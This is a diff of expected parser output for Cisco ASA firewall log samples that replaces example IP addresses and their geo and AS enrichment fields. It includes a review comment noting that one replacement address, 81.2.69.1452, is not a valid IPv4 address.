- "event.original": "%ASA-5-302013: Built inbound TCP connection 195207391 for OUTSIDE:85.0.0.1/12312 (62.0.0.1/34534)(LOCAL\\user@domain.tld) to OUTSIDE:81.0.0.1/443 (81.0.0.1/443) (user@domain.tld)",
+ "event.original": "%ASA-5-302013: Built inbound TCP connection 195207391 for OUTSIDE:1.128.3.4/12312 (62.0.0.1/34534)(LOCAL\\user@domain.tld) to OUTSIDE:89.160.20.156/443 (89.160.20.156/443) (user@domain.tld)",
 "event.severity": 5,
 "event.timezone": "-02:00",
 "event.type": [
@@ -3921,8 +3913,8 @@
 "input.type": "log",
 "log.file.path": "sample.log",
 "log.level": "notification",
- "log.offset": 11404,
- "network.community_id": "1:80+NOqHrJ3D1YMNcnBpJC7S6Pkg=",
+ "log.offset": 11427,
+ "network.community_id": "1:k/bYSo4xyVOcBd5vnxfeC3/AAzY=",
 "network.direction": "inbound",
 "network.iana_number": 6,
 "network.transport": "tcp",
@@ -3935,26 +3927,18 @@
 "domain.tld"
 ],
 "related.ip": [
+ "1.128.3.4",
 "62.0.0.1",
- "81.0.0.1",
- "85.0.0.1"
+ "89.160.20.156"
 ],
 "related.user": [
 "user@domain.tld"
 ],
 "service.type": "cisco",
- "source.address": "85.0.0.1",
- "source.as.number": 3303,
- "source.as.organization.name": "Bluewin",
- "source.geo.city_name": "Kolliken",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "CH",
- "source.geo.country_name": "Switzerland",
- "source.geo.location.lat": 47.3388,
- "source.geo.location.lon": 8.0264,
- "source.geo.region_iso_code": "CH-AG",
- "source.geo.region_name": "Aargau",
- "source.ip": "85.0.0.1",
+ "source.address": "1.128.3.4",
+ "source.as.number": 1221,
+ "source.as.organization.name": "Telstra Pty Ltd",
+ "source.ip": "1.128.3.4",
 "source.nat.ip": "62.0.0.1",
 "source.nat.port": "34534",
 "source.port": 12312,
@@ -3970,21 +3954,13 @@
 "cisco.asa.destination_username": "LOCAL\\USER001",
 "cisco.asa.icmp_code": 3,
 "cisco.asa.icmp_type": 3,
- "cisco.asa.mapped_source_ip": "81.0.0.1",
+ "cisco.asa.mapped_source_ip": "89.160.20.156",
 "cisco.asa.message_id": "302020",
 "cisco.asa.source_username": "USER001",
- "destination.address": "85.0.0.1",
- "destination.as.number": 3303,
- "destination.as.organization.name": "Bluewin",
- "destination.geo.city_name": "Kolliken",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "CH",
- "destination.geo.country_name": "Switzerland",
- "destination.geo.location.lat": 47.3388,
- "destination.geo.location.lon": 8.0264,
- "destination.geo.region_iso_code": "CH-AG",
- "destination.geo.region_name": "Aargau",
- "destination.ip": "85.0.0.1",
+ "destination.address": "1.128.3.4",
+ "destination.as.number": 1221,
+ "destination.as.organization.name": "Telstra Pty Ltd",
+ "destination.ip": "1.128.3.4",
 "destination.user.name": "USER001",
 "event.action": "flow-expiration",
 "event.category": [
@@ -3994,7 +3970,7 @@
 "event.dataset": "cisco.asa",
 "event.kind": "event",
 "event.module": "cisco",
- "event.original": "%ASA-5-302020: Built inbound ICMP connection for faddr 85.0.0.1/0(LOCAL\\USER001) gaddr 81.0.0.1/0 laddr 81.0.0.1/0 (USER001) type 3 code 3",
+ "event.original": "%ASA-5-302020: Built inbound ICMP connection for faddr 1.128.3.4/0(LOCAL\\USER001) gaddr 89.160.20.156/0 laddr 89.160.20.156/0 (USER001) type 3 code 3",
 "event.severity": 5,
 "event.timezone": "-02:00",
 "event.type": [
@@ -4005,32 +3981,32 @@
 "input.type": "log",
 "log.file.path": "sample.log",
 "log.level": "notification",
- "log.offset": 11604,
+ "log.offset": 11638,
 "network.direction": "inbound",
 "network.protocol": "icmp",
 "observer.product": "asa",
 "observer.type": "firewall",
 "observer.vendor": "Cisco",
 "related.ip": [
- "81.0.0.1",
- "85.0.0.1"
+ "1.128.3.4",
+ "89.160.20.156"
 ],
 "related.user": [
 "USER001"
 ],
 "service.type": "cisco",
- "source.address": "81.0.0.1",
- "source.as.number": 15704,
- "source.as.organization.name": "Xtra Telecom S.A.",
- "source.geo.city_name": "Madrid",
+ "source.address": "89.160.20.156",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
+ "source.geo.city_name": "Link\u00f6ping",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 40.4143,
- "source.geo.location.lon": -3.7016,
- "source.geo.region_iso_code": "ES-M",
- "source.geo.region_name": "Madrid",
- "source.ip": "81.0.0.1",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.156",
 "source.user.name": "USER001",
 "tags": [
 "cisco-asa",
@@ -4043,21 +4019,13 @@
 "cisco.asa.destination_username": "LOCAL\\user@domain.tld",
 "cisco.asa.icmp_code": 3,
 "cisco.asa.icmp_type": 3,
- "cisco.asa.mapped_source_ip": "81.0.0.1",
+ "cisco.asa.mapped_source_ip": "89.160.20.156",
 "cisco.asa.message_id": "302020",
 "cisco.asa.source_username": "user@domain.tld",
- "destination.address": "85.0.0.1",
- "destination.as.number": 3303,
- "destination.as.organization.name": "Bluewin",
- "destination.geo.city_name": "Kolliken",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "CH",
- "destination.geo.country_name": "Switzerland",
- "destination.geo.location.lat": 47.3388,
- "destination.geo.location.lon": 8.0264,
- "destination.geo.region_iso_code": "CH-AG",
- "destination.geo.region_name": "Aargau",
- "destination.ip": "85.0.0.1",
+ "destination.address": "1.128.3.4",
+ "destination.as.number": 1221,
+ "destination.as.organization.name": "Telstra Pty Ltd",
+ "destination.ip": "1.128.3.4",
 "destination.user.domain": "domain.tld",
 "destination.user.name": "user@domain.tld",
 "event.action": "flow-expiration",
@@ -4068,7 +4036,7 @@
 "event.dataset": "cisco.asa",
 "event.kind": "event",
 "event.module": "cisco",
- "event.original": "%ASA-5-302020: Built inbound ICMP connection for faddr 85.0.0.1/0(LOCAL\\user@domain.tld) gaddr 81.0.0.1/0 laddr 81.0.0.1/0 (user@domain.tld) type 3 code 3",
+ "event.original": "%ASA-5-302020: Built inbound ICMP connection for faddr 1.128.3.4/0(LOCAL\\user@domain.tld) gaddr 89.160.20.156/0 laddr 89.160.20.156/0 (user@domain.tld) type 3 code 3",
 "event.severity": 5,
 "event.timezone": "-02:00",
 "event.type": [
@@ -4079,7 +4047,7 @@
 "input.type": "log",
 "log.file.path": "sample.log",
 "log.level": "notification",
- "log.offset": 11765,
+ "log.offset": 11810,
 "network.direction": "inbound",
 "network.protocol": "icmp",
 "observer.product": "asa",
@@ -4089,25 +4057,25 @@
 "domain.tld"
 ],
 "related.ip": [
- "81.0.0.1",
- "85.0.0.1"
+ "1.128.3.4",
+ "89.160.20.156"
 ],
 "related.user": [
 "user@domain.tld"
 ],
 "service.type": "cisco",
- "source.address": "81.0.0.1",
- "source.as.number": 15704,
- "source.as.organization.name": "Xtra Telecom S.A.",
- "source.geo.city_name": "Madrid",
+ "source.address": "89.160.20.156",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
+ "source.geo.city_name": "Link\u00f6ping",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 40.4143,
- "source.geo.location.lon": -3.7016,
- "source.geo.region_iso_code": "ES-M",
- "source.geo.region_name": "Madrid",
- "source.ip": "81.0.0.1",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.156",
 "source.user.domain": "domain.tld",
 "source.user.name": "user@domain.tld",
 "tags": [
@@ -4121,21 +4089,13 @@
 "cisco.asa.destination_username": "AD\\USER002",
 "cisco.asa.icmp_code": 3,
 "cisco.asa.icmp_type": 3,
- "cisco.asa.mapped_source_ip": "81.0.0.1",
+ "cisco.asa.mapped_source_ip": "89.160.20.156",
 "cisco.asa.message_id": "302020",
 "cisco.asa.source_username": "USER002",
- "destination.address": "85.0.0.1",
- "destination.as.number": 3303,
- "destination.as.organization.name": "Bluewin",
- "destination.geo.city_name": "Kolliken",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "CH",
- "destination.geo.country_name": "Switzerland",
- "destination.geo.location.lat": 47.3388,
- "destination.geo.location.lon": 8.0264,
- "destination.geo.region_iso_code": "CH-AG",
- "destination.geo.region_name": "Aargau",
- "destination.ip": "85.0.0.1",
+ "destination.address": "1.128.3.4",
+ "destination.as.number": 1221,
+ "destination.as.organization.name": "Telstra Pty Ltd",
+ "destination.ip": "1.128.3.4",
 "destination.user.domain": "AD",
 "destination.user.name": "USER002",
 "event.action": "flow-expiration",
@@ -4146,7 +4106,7 @@
 "event.dataset": "cisco.asa",
 "event.kind": "event",
 "event.module": "cisco",
- "event.original": "%ASA-5-302020: Built inbound ICMP connection for faddr 85.0.0.1/0(AD\\USER002) gaddr 81.0.0.1/0 laddr 81.0.0.1/0 (USER002) type 3 code 3",
+ "event.original": "%ASA-5-302020: Built inbound ICMP connection for faddr 1.128.3.4/0(AD\\USER002) gaddr 89.160.20.156/0 laddr 89.160.20.156/0 (USER002) type 3 code 3",
 "event.severity": 5,
 "event.timezone": "-02:00",
 "event.type": [
@@ -4157,7 +4117,7 @@
 "input.type": "log",
 "log.file.path": "sample.log",
 "log.level": "notification",
- "log.offset": 11942,
+ "log.offset": 11998,
 "network.direction": "inbound",
 "network.protocol": "icmp",
 "observer.product": "asa",
@@ -4167,25 +4127,25 @@
 "AD"
 ],
 "related.ip": [
- "81.0.0.1",
- "85.0.0.1"
+ "1.128.3.4",
+ "89.160.20.156"
 ],
 "related.user": [
 "USER002"
 ],
 "service.type": "cisco",
- "source.address": "81.0.0.1",
- "source.as.number": 15704,
- "source.as.organization.name": "Xtra Telecom S.A.",
- "source.geo.city_name": "Madrid",
+ "source.address": "89.160.20.156",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
+ "source.geo.city_name": "Link\u00f6ping",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 40.4143,
- "source.geo.location.lon": -3.7016,
- "source.geo.region_iso_code": "ES-M",
- "source.geo.region_name": "Madrid",
- "source.ip": "81.0.0.1",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.156",
 "source.user.name": "USER002",
 "tags": [
 "cisco-asa",
@@ -4202,14 +4162,6 @@
 "destination.address": "75.0.0.1",
 "destination.as.number": 7018,
 "destination.as.organization.name": "AT&T Services, Inc.",
- "destination.geo.city_name": "Carson City",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 39.1507,
- "destination.geo.location.lon": -119.7459,
- "destination.geo.region_iso_code": "US-NV",
- "destination.geo.region_name": "Nevada",
 "destination.ip": "75.0.0.1",
 "destination.port": 18449,
 "event.action": "flow-expiration",
@@ -4234,7 +4186,7 @@
 "input.type": "log",
 "log.file.path": "sample.log",
 "log.level": "informational",
- "log.offset": 12100,
+ "log.offset": 12167,
 "network.community_id": "1:kOYfvYjW0lZrPxD+ArQ6vDYnS7g=",
 "network.iana_number": 6,
 "network.transport": "tcp",
@@ -4287,7 +4239,7 @@
 "input.type": "log",
 "log.file.path": "sample.log",
 "log.level": "informational",
- "log.offset": 12259,
+ "log.offset": 12326,
 "network.community_id": "1:bHWN9qumWIGMl/MbjgS2bQi/Jsw=",
 "network.iana_number": 1,
 "network.transport": "icmp",
@@ -4318,13 +4270,6 @@
 "cisco.asa.source_interface": "OUTSIDE",
 "cisco.asa.termination_user": "soc@danskecommodities.com",
 "destination.address": "2a03:2880:f253:cb:face:b00c:0:43fe",
- "destination.as.number": 32934,
- "destination.as.organization.name": "Facebook, Inc.",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "IE",
- "destination.geo.country_name": "Ireland",
- "destination.geo.location.lat": 53.0,
- "destination.geo.location.lon": -8.0,
 "destination.ip": "2a03:2880:f253:cb:face:b00c:0:43fe",
 "destination.port": 443,
 "event.action": "firewall-rule",
@@ -4345,7 +4290,7 @@
 "input.type": "log",
 "log.file.path": "sample.log",
 "log.level": "informational",
- "log.offset": 12425,
+ "log.offset": 12492,
 "network.community_id": "1:lOTrEnVpsUc4jukAUBxF/BkD8jE=",
 "network.direction": "inbound",
 "network.iana_number": 6,
@@ -4374,15 +4319,8 @@
 "cisco.asa.message_id": "305012",
 "cisco.asa.source_interface": "OUTSIDE",
 "cisco.asa.source_username": "LOCAL\\domain\\USER001",
- "destination.address": "181.0.0.1",
- "destination.as.number": 7303,
- "destination.as.organization.name": "Telecom Argentina S.A.",
- "destination.geo.continent_name": "South America",
- "destination.geo.country_iso_code": "AR",
- "destination.geo.country_name": "Argentina",
- "destination.geo.location.lat": -34.6033,
- "destination.geo.location.lon": -58.3817,
- "destination.ip": "181.0.0.1",
+ "destination.address": "189.160.20.156",
+ "destination.ip": "189.160.20.156",
 "destination.port": 50120,
 "event.action": "flow-expiration",
 "event.category": [
@@ -4394,7 +4332,7 @@
 "event.end": "2021-01-15T19:12:37.000-02:00",
 "event.kind": "event",
 "event.module": "cisco",
- "event.original": "%ASA-6-305012: Teardown dynamic TCP translation from OUTSIDE:81.0.0.1/50120(LOCAL\\domain\\USER001) to OUTSIDE:181.0.0.1/50120 duration 0:02:05",
+ "event.original": "%ASA-6-305012: Teardown dynamic TCP translation from OUTSIDE:89.160.20.156/50120(LOCAL\\domain\\USER001) to OUTSIDE:189.160.20.156/50120 duration 0:02:05",
 "event.severity": 6,
 "event.start": "2021-01-15T21:10:32.000Z",
 "event.timezone": "-02:00",
@@ -4406,8 +4344,8 @@
 "input.type": "log",
 "log.file.path": "sample.log",
 "log.level": "informational",
- "log.offset": 12678,
- "network.community_id": "1:R7zADbxzUGXOH0O/Hzma4ba6iHU=",
+ "log.offset": 12745,
+ "network.community_id": "1:vXccEuUJmxpSB1JgjEhGeCaR+48=",
 "network.iana_number": 6,
 "network.transport": "tcp",
 "observer.egress.interface.name": "OUTSIDE",
@@ -4419,25 +4357,25 @@
 "domain"
 ],
 "related.ip": [
- "181.0.0.1",
- "81.0.0.1"
+ "189.160.20.156",
+ "89.160.20.156"
 ],
 "related.user": [
 "USER001"
 ],
 "service.type": "cisco",
- "source.address": "81.0.0.1",
- "source.as.number": 15704,
- "source.as.organization.name": "Xtra Telecom S.A.",
- "source.geo.city_name": "Madrid",
+ "source.address": "89.160.20.156",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
+ "source.geo.city_name": "Link\u00f6ping",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 40.4143,
- "source.geo.location.lon": -3.7016,
- "source.geo.region_iso_code": "ES-M",
- "source.geo.region_name": "Madrid",
- "source.ip": "81.0.0.1",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.156",
 "source.port": 50120,
 "source.user.domain": "domain",
 "source.user.name": "USER001",
@@ -4456,13 +4394,6 @@
 "cisco.asa.termination_initiator": "OUTSIDE",
 "cisco.asa.termination_user": "domain\\USER001",
 "destination.address": "40.0.0.1",
- "destination.as.number": 4249,
- "destination.as.organization.name": "Eli Lilly and Company",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "40.0.0.1",
 "destination.port": 443,
 "event.action": "flow-expiration",
@@ -4475,7 +4406,7 @@
 "event.end": "2021-01-15T19:12:37.000-02:00",
 "event.kind": "event",
 "event.module": "cisco",
- "event.original": "%ASA-6-302014: Teardown TCP connection 261246338 for OUTSIDE:81.0.0.1/50120(LOCAL\\domain\\USER001) to OUTSIDE:40.0.0.1/443 duration 0:02:05 bytes 9610 TCP FINs from OUTSIDE (domain\\USER001)",
+ "event.original": "%ASA-6-302014: Teardown TCP connection 261246338 for OUTSIDE:89.160.20.156/50120(LOCAL\\domain\\USER001) to OUTSIDE:40.0.0.1/443 duration 0:02:05 bytes 9610 TCP FINs from OUTSIDE (domain\\USER001)",
 "event.reason": "TCP FINs",
 "event.severity": 6,
 "event.start": "2021-01-15T21:10:32.000Z",
@@ -4488,9 +4419,9 @@
 "input.type": "log",
 "log.file.path": "sample.log",
 "log.level": "informational",
- "log.offset": 12842,
+ "log.offset": 12919,
 "network.bytes": 9610,
- "network.community_id": "1:Wki7xXtyiCACPfXpHuQV+NLf33o=",
+ "network.community_id": "1:G4ALpkc+kkJFzBlSGnNhTyQjj5c=",
 "network.iana_number": 6,
 "network.transport": "tcp",
 "observer.egress.interface.name": "OUTSIDE",
@@ -4503,24 +4434,24 @@
 ],
 "related.ip": [
 "40.0.0.1",
- "81.0.0.1"
+ "89.160.20.156"
 ],
 "related.user": [
 "USER001"
 ],
 "service.type": "cisco",
- "source.address": "81.0.0.1",
- "source.as.number": 15704,
- "source.as.organization.name": "Xtra Telecom S.A.",
- "source.geo.city_name": "Madrid",
+ "source.address": "89.160.20.156",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
+ "source.geo.city_name": "Link\u00f6ping",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 40.4143,
- "source.geo.location.lon": -3.7016,
- "source.geo.region_iso_code": "ES-M",
- "source.geo.region_name": "Madrid",
- "source.ip": "81.0.0.1",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.156",
 "source.port": 50120,
 "source.user.domain": "domain",
 "source.user.name": "USER001",
@@ -4535,7 +4466,7 @@
 "cisco.asa.destination_interface": "INSIDE",
 "cisco.asa.mapped_destination_ip": "192.168.0.1",
 "cisco.asa.mapped_destination_port": 53,
- "cisco.asa.mapped_source_ip": "82.0.0.1",
+ "cisco.asa.mapped_source_ip": "67.43.156.13",
 "cisco.asa.mapped_source_port": 63790,
 "cisco.asa.message_id": "302015",
 "cisco.asa.source_interface": "OUTSIDE",
@@ -4552,7 +4483,7 @@
 "event.dataset": "cisco.asa",
 "event.kind": "event",
 "event.module": "cisco",
- "event.original": "%ASA-6-302015: Built inbound UDP connection 261311655 for OUTSIDE:81.0.0.1/63790 (82.0.0.1/63790)(LOCAL\\domain\\USER001) to INSIDE:192.168.0.1/53 (192.168.0.1/53) (domain\\USER001)",
+ "event.original": "%ASA-6-302015: Built inbound UDP connection 261311655 for OUTSIDE:89.160.20.156/63790 (67.43.156.13/63790)(LOCAL\\domain\\USER001) to INSIDE:192.168.0.1/53 (192.168.0.1/53) (domain\\USER001)",
 "event.severity": 6,
 "event.timezone": "-02:00",
 "event.type": [
@@ -4562,8 +4493,8 @@
 "input.type": "log",
 "log.file.path": "sample.log",
 "log.level": "informational",
- "log.offset": 13053,
- "network.community_id": "1:BIxqdLncXeXXZrNudh3yrj2zmZc=",
+ "log.offset": 13135,
+ "network.community_id": "1:4sghryHbfd+vkUilwrakMfDSXPg=",
 "network.direction": "inbound",
 "network.iana_number": 17,
 "network.transport": "udp",
@@ -4577,26 +4508,26 @@
 ],
 "related.ip": [
 "192.168.0.1",
- "81.0.0.1",
- "82.0.0.1"
+ "67.43.156.13",
+ "89.160.20.156"
 ],
 "related.user": [
 "USER001"
 ],
 "service.type": "cisco",
- "source.address": "81.0.0.1",
- "source.as.number": 15704,
- "source.as.organization.name": "Xtra Telecom S.A.",
- "source.geo.city_name": "Madrid",
+ "source.address": "89.160.20.156",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
+ "source.geo.city_name": "Link\u00f6ping",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 40.4143,
- "source.geo.location.lon": -3.7016,
- "source.geo.region_iso_code": "ES-M",
- "source.geo.region_name": "Madrid",
- "source.ip": "81.0.0.1",
- "source.nat.ip": "82.0.0.1",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.156",
+ "source.nat.ip": "67.43.156.13",
 "source.port": 63790,
 "source.user.domain": "domain",
 "source.user.name": "USER001",
@@ -4626,7 +4557,7 @@
 "event.end": "2021-01-15T19:12:37.000-02:00",
 "event.kind": "event",
 "event.module": "cisco",
- "event.original": "%ASA-6-302016: Teardown UDP connection 261311655 for OUTSIDE:81.0.0.1/63790(LOCAL\\domain\\USER001) to INSIDE:192.168.0.1/53 duration 0:00:00 bytes 139 (domain\\USER001)",
+ "event.original": "%ASA-6-302016: Teardown UDP connection 261311655 for OUTSIDE:89.160.20.156/63790(LOCAL\\domain\\USER001) to INSIDE:192.168.0.1/53 duration 0:00:00 bytes 139 (domain\\USER001)",
 "event.severity": 6,
 "event.start": "2021-01-15T21:12:37.000Z",
 "event.timezone": "-02:00",
@@ -4638,9 +4569,9 @@
 "input.type": "log",
 "log.file.path": "sample.log",
 "log.level": "informational",
- "log.offset": 13254,
+ "log.offset": 13345,
 "network.bytes": 139,
- "network.community_id": "1:BIxqdLncXeXXZrNudh3yrj2zmZc=",
+ "network.community_id": "1:4sghryHbfd+vkUilwrakMfDSXPg=",
 "network.iana_number": 17,
 "network.transport": "udp",
 "observer.egress.interface.name": "INSIDE",
@@ -4653,24 +4584,24 @@
 ],
 "related.ip": [
 "192.168.0.1",
- "81.0.0.1"
+ "89.160.20.156"
 ],
 "related.user": [
 "USER001"
 ],
 "service.type": "cisco",
- "source.address": "81.0.0.1",
- "source.as.number": 15704,
- "source.as.organization.name": "Xtra Telecom S.A.",
- "source.geo.city_name": "Madrid",
+ "source.address": "89.160.20.156",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
+ "source.geo.city_name": "Link\u00f6ping",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 40.4143,
- "source.geo.location.lon": -3.7016,
- "source.geo.region_iso_code": "ES-M",
- "source.geo.region_name": "Madrid",
- "source.ip": "81.0.0.1",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.156",
 "source.port": 63790,
 "source.user.domain": "domain",
 "source.user.name": "USER001",
@@ -4685,20 +4616,13 @@
 "cisco.asa.destination_interface": "OUTSIDE",
 "cisco.asa.mapped_destination_ip": "40.0.0.1",
 "cisco.asa.mapped_destination_port": 443,
- "cisco.asa.mapped_source_ip": "82.0.0.1",
+ "cisco.asa.mapped_source_ip": "67.43.156.13",
 "cisco.asa.mapped_source_port": 50120,
 "cisco.asa.message_id": "302013",
 "cisco.asa.source_interface": "OUTSIDE",
 "cisco.asa.source_username": "LOCAL\\domain\\USER001",
 "cisco.asa.termination_user": "domain\\USER001",
 "destination.address": "40.0.0.1",
- "destination.as.number": 4249,
- "destination.as.organization.name": "Eli Lilly and Company",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "40.0.0.1",
 "destination.port": 443,
 "event.action": "firewall-rule",
@@ -4709,7 +4633,7 @@
 "event.dataset": "cisco.asa",
 "event.kind": "event",
 "event.module": "cisco",
- "event.original": "%ASA-6-302013: Built inbound TCP connection 261246338 for OUTSIDE:81.0.0.1/50120 (82.0.0.1/50120)(LOCAL\\domain\\USER001) to OUTSIDE:40.0.0.1/443 (40.0.0.1/443) (domain\\USER001)",
+ "event.original": "%ASA-6-302013: Built inbound TCP connection 261246338 for OUTSIDE:89.160.20.156/50120 (67.43.156.13/50120)(LOCAL\\domain\\USER001) to OUTSIDE:40.0.0.1/443 (40.0.0.1/443) (domain\\USER001)",
 "event.severity": 6,
 "event.timezone": "-02:00",
 "event.type": [
@@ -4719,8 +4643,8 @@
 "input.type": "log",
 "log.file.path": "sample.log",
 "log.level": "informational",
- "log.offset": 13443,
- "network.community_id": "1:Wki7xXtyiCACPfXpHuQV+NLf33o=",
+ "log.offset": 13539,
+ "network.community_id": "1:G4ALpkc+kkJFzBlSGnNhTyQjj5c=",
 "network.direction": "inbound",
 "network.iana_number": 6,
 "network.transport": "tcp",
@@ -4734,26 +4658,26 @@
 ],
 "related.ip": [
 "40.0.0.1",
- "81.0.0.1",
- "82.0.0.1"
+ "67.43.156.13",
+ "89.160.20.156"
 ],
 "related.user": [
 "USER001"
 ],
 "service.type": "cisco",
- "source.address": "81.0.0.1",
- "source.as.number": 15704,
- "source.as.organization.name": "Xtra Telecom S.A.",
- "source.geo.city_name": "Madrid",
+ "source.address": "89.160.20.156",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
+ "source.geo.city_name": "Link\u00f6ping",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 40.4143,
- "source.geo.location.lon": -3.7016,
- "source.geo.region_iso_code": "ES-M",
- "source.geo.region_name": "Madrid",
- "source.ip": "81.0.0.1",
- "source.nat.ip": "82.0.0.1",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.156",
+ "source.nat.ip": "67.43.156.13",
 "source.port": 50120,
 "source.user.domain": "domain",
 "source.user.name": "USER001",
@@ -4766,15 +4690,8 @@
 "@timestamp": "2021-07-29T08:35:29.000-02:00",
 "cisco.asa.message_id": "602304",
 "cisco.asa.tunnel_type": "LAN-to-LAN",
- "destination.address": "12.12.12.12",
- "destination.as.number": 32328,
- "destination.as.organization.name": "Alascom, Inc.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "12.12.12.12",
+ "destination.address": "81.2.69.1452",
+ "destination.domain": "81.2.69.1452",
 "event.action": "deleted",
 "event.category": [
 "network"
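Review bot: The replacement address `81.2.69.1452` introduced in the `@@ -4766,15 +4690,8 @@` hunk is not a valid IPv4 address (its last octet exceeds 255), which is why the expected output now files it under `destination.domain` and, in the `@@ -4797` hunk, under `related.hosts` and `source.domain` rather than `destination.ip`/`related.ip`; the same value recurs in the `event.original` of the `@@ -4783` hunk. This quietly changes what the 602304 IPSEC LAN-to-LAN sample exercises: the IP/geo enrichment path for that message is no longer covered, and the fixture instead codifies the parser's fallback for a malformed address. If the intent was only to swap a public address for a reserved test address, an extra digit appears to have crept in; correct the value in the sample log (outside this diff's visible range) to a valid four-octet test address and regenerate the expected file. If the malformed-address fallback is meant to be covered, a separately named sample line would make that intent explicit instead of hiding it in this record.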
@@ -4783,7 +4700,7 @@
 "event.dataset": "cisco.asa",
 "event.kind": "event",
 "event.module": "cisco",
- "event.original": "%ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xABCXYZ) between 12.12.12.12 and 12.12.12.12 (user= 12.12.12.12) has been deleted.",
+ "event.original": "%ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xABCXYZ) between 81.2.69.1452 and 81.2.69.1452 (user= 81.2.69.1452) has been deleted.",
 "event.outcome": "success",
 "event.severity": 6,
 "event.timezone": "-02:00",
@@ -4797,32 +4714,25 @@
 "input.type": "log",
 "log.file.path": "sample.log",
 "log.level": "informational",
- "log.offset": 13641,
+ "log.offset": 13746,
 "network.direction": "outbound",
 "network.type": "ipsec",
 "observer.product": "asa",
 "observer.type": "firewall",
 "observer.vendor": "Cisco",
- "related.ip": [
- "12.12.12.12"
+ "related.hosts": [
+ "81.2.69.1452"
 ],
 "related.user": [
- "12.12.12.12"
+ "81.2.69.1452"
 ],
 "service.type": "cisco",
- "source.address": "12.12.12.12",
- "source.as.number": 32328,
- "source.as.organization.name": "Alascom, Inc.",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
